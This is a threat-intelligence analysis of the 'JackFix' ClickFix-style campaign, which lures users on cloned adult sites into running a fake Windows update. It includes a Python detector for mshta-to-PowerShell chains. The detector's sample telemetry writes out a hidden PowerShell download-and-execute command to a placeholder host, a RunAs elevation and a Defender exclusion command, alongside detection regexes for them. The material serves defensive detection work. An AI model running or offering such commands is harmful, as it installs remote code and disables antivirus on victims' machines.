Full Report
Cybersecurity researchers are calling attention to a new campaign that's leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a "critical" Windows security update. "Campaign leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising," Acronis said in a
Analysis Summary
# Tool/Technique: JackFix Campaign (Leveraging ClickFix methodology)
## Overview
The "JackFix" campaign is a new threat leveraging a methodology similar to ClickFix attacks, but specifically targets users on fake adult websites (clones of xHamster, PornHub) via malvertising. Victims are tricked into running malicious commands disguised as a "critical" Windows security update to initiate the infection chain, ultimately leading to the deployment of multiple stealer malware families.
## Technical Details
- Type: Technique / Campaign (Utilizes obfuscated scripts and legitimate binaries)
- Platform: Windows
- Capabilities: Screen takeover, JavaScript/HTML execution, PowerShell payload retrieval, privilege escalation, dropping secondary payloads (RATs, Stealers).
- First Seen: Recent, as detailed in a report shared by Acronis.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.002 - Spearphishing Link (implied via the malvertising redirect to the malicious site)
  - T1189 - Drive-by Compromise (execution likely happens upon user interaction on the cloned site)
- **TA0002 - Execution**
  - T1204.002 - User Execution: Malicious File (the user runs the malicious command themselves)
  - T1059 - Command and Scripting Interpreter
    - T1059.001 - PowerShell
- **TA0004 - Privilege Escalation**
  - T1548.002 - Bypass User Account Control (use of `Start-Process -Verb RunAs`)
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information (use of garbage code and obfuscated PowerShell)
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer (retrieval of subsequent PowerShell scripts from a remote server)
## Functionality
### Core Capabilities
- **Malvertising Distribution:** Redirects unsuspecting users to highly realistic cloned adult websites.
- **Screen Hijacking:** Uses HTML/JavaScript to force the browser into a full-screen mode, displaying a convincing, fake Windows Update alert to establish urgency.
- **Initial Command Execution:** Tricks the user into executing a command via the Windows Run dialog (`Ctrl + V`, Enter), which launches an **MSHTA payload**.
- **Payload Staging:** The MSHTA payload executes JavaScript to launch an **obfuscated PowerShell command** to retrieve and execute subsequent scripts from a remote server.
### Advanced Features
- **Anti-Analysis C2:** Remote domains hosting subsequent payloads are configured to redirect benign direct requests (e.g., in a browser) to legitimate sites (Google, Steam). The script only returns malicious code when requested via specific PowerShell commands (`irm` or `iwr`).
- **Persistence/Evasion:** The executed PowerShell script attempts to **elevate privileges** using `Start-Process -Verb RunAs` and creates **Microsoft Defender Antivirus exclusions** for C2 addresses and payload staging paths.
- **Key Lockout:** Attempts to disable the usual ways of leaving the page (the Escape, F11, F5 and F12 keys) so users cannot close the fake update window; the report notes this functionality was faulty.
- **Secondary Deployment:** Upon successful privilege escalation, the campaign drops additional malware, including **simple Remote Access Trojans (RATs)** and **Stealers**.
## Indicators of Compromise
- File Hashes: Not specified in the excerpt.
- File Names: Not specified in the excerpt (Payloads are downloaded dynamically).
- Registry Keys: Not specified in the excerpt (Focus is on Defender exclusions).
- Network Indicators: **Remote servers hosting payloads** that respond with malicious code only to PowerShell `irm`/`iwr` requests and redirect other requests to legitimate sites. Specific domains are not given in the excerpt.
- Behavioral Indicators:
- Invocation of `mshta.exe` resulting from user interaction on a website.
- Use of `Start-Process -Verb RunAs` to elevate PowerShell sessions.
- Attempts to add exclusions to Microsoft Defender Antivirus.
## Associated Threat Actors
- Possibly a **Russian-speaking threat actor**, suggested by developer comments in Russian found within select site iterations.
- General association with groups utilizing **ClickFix-style infection chains**.
## Detection Methods
- **Signature-based detection:** Signatures for the initial MSHTA launch sequence or known malicious C2 domains.
- **Behavioral detection:** Monitoring for legitimate processes (like MSHTA) executing obscure or heavily obfuscated scripts that immediately attempt remote file retrieval via PowerShell or system changes (Defender exclusions, UAC prompts).
- **YARA rules:** Not explicitly mentioned.
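The behavioral detection described above, as an added example that is not part of the Acronis report: a small correlation routine over process-creation telemetry (Sysmon Event ID 1 or Windows 4688 style fields: PID, parent PID, image, command line) that flags the stages the report names (`mshta.exe` loading remote content, a PowerShell child of `mshta.exe` using `irm`/`iwr`, `Start-Process -Verb RunAs`, and a Defender exclusion change) and scores the whole tree. The sample events, the staging hostname `staging.example.invalid`, and the use of `Add-MpPreference`/`Set-MpPreference` as the exclusion-setting cmdlets are assumptions constructed for the example; the report does not publish the actual command lines or domains.

```python
"""Behavioral detection for a JackFix/ClickFix-style chain (added example, not vendor code).

Input: process-creation events (pid, ppid, image, command line).  Output: per-process
indicator hits plus a severity for the tree, so an analyst can see which stage fired.
"""
import re
from dataclasses import dataclass

# Cmdlets/aliases the report says the staging server answers (irm/iwr).
FETCH_RE = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)
# Elevation attempt named in the report.
RUNAS_RE = re.compile(r"start-process\b.*?-verb\s+runas", re.I)
# Defender exclusion change via PowerShell (assumption: Add-/Set-MpPreference cmdlets).
EXCLUSION_RE = re.compile(
    r"\b(add|set)-mppreference\b.*?-exclusion(path|process|extension|ipaddress)\b", re.I)
URL_RE = re.compile(r"\bhttps?://", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def _name(path: str) -> str:
    """Normalise an image path to its lower-case file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def event_indicators(ev: ProcEvent) -> list:
    """Stage indicators visible in a single event, without tree context."""
    name = _name(ev.image)
    hits = []
    if name == "mshta.exe" and URL_RE.search(ev.cmdline):
        hits.append("mshta_remote_content")          # mshta pointed at a URL
    if name in POWERSHELL:
        if FETCH_RE.search(ev.cmdline):
            hits.append("powershell_remote_fetch")   # irm/iwr staging retrieval
        if RUNAS_RE.search(ev.cmdline):
            hits.append("powershell_runas_elevation")
    if EXCLUSION_RE.search(ev.cmdline):
        hits.append("defender_exclusion_change")     # any process, per the EDR guidance
    return hits


def ancestry(ev: ProcEvent, by_pid: dict) -> list:
    """Image names of the event's ancestors, nearest first; cycle-safe."""
    chain, seen, cur = [], set(), ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(_name(cur.image))
    return chain


def analyze(events: list) -> list:
    """Return (pid, image, hits) for every event with at least one indicator."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        hits = event_indicators(ev)
        if not hits:
            continue
        # Tree context: PowerShell whose ancestry passes through mshta.exe.
        if _name(ev.image) in POWERSHELL and "mshta.exe" in ancestry(ev, by_pid):
            hits.append("powershell_descends_from_mshta")
        findings.append((ev.pid, _name(ev.image), hits))
    return findings


def severity(findings: list) -> str:
    """Score the tree: the mshta->PowerShell fetch chain is the core; elevation
    or an exclusion change on top of it is treated as critical."""
    all_hits = {h for _, _, hs in findings for h in hs}
    chain = {"powershell_descends_from_mshta", "powershell_remote_fetch"} <= all_hits
    if chain and {"powershell_runas_elevation", "defender_exclusion_change"} & all_hits:
        return "critical"
    if chain:
        return "high"
    return "medium" if all_hits else "none"


# Constructed sample telemetry (not from the report): Run-dialog launch of mshta,
# staged PowerShell, elevation, exclusion, and one benign PowerShell for contrast.
SAMPLE_EVENTS = [
    ProcEvent(4100, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4120, 4100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://staging.example.invalid/update"),
    ProcEvent(4140, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm https://staging.example.invalid/s1)"'),
    ProcEvent(4160, 4140, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Start-Process powershell -Verb RunAs"'),
    ProcEvent(4180, 4160, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Add-MpPreference -ExclusionPath C:\\Users\\Public"'),
    ProcEvent(5000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Get-Process"'),
]

if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for pid, image, hits in results:
        print(pid, image, ", ".join(hits))
    print("severity:", severity(results))
```

The tree correlation is what separates this from a plain command-line signature: `irm` in a PowerShell command line is common in administration, but a PowerShell process whose ancestry passes through `mshta.exe` and that immediately fetches a script is the shape the report describes, and a Defender exclusion change anywhere in that tree is the point at which the EDR guidance above says to block rather than merely alert.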
## Mitigation Strategies
- **Browser Security:** Ensure JavaScript execution policies are tightly controlled, although this is difficult as the technique relies on standard browser functions.
- **User Education:** Educate users about the dangers of malvertising, especially on adult websites, and train them to identify and close browser alerts, particularly those demanding immediate security action via the Run dialog.
- **Principle of Least Privilege:** Limit user privileges to reduce the impact of successful privilege escalation attempts like those using `-Verb RunAs`.
- **Endpoint Protection:** Ensure EDR/XDR solutions are configured to flag or block the creation of security product exclusions by non-standard processes.
## Related Tools/Techniques
- **ClickFix:** This campaign is an iteration or evolution of widespread ClickFix attacks, which often use CAPTCHA or minor technical fixes as lures.
- **Stealers/RATs:** The specific malware families dropped are not named, but the delivery mechanism is designed to install commodity malware like Remote Access Trojans and Information Stealers.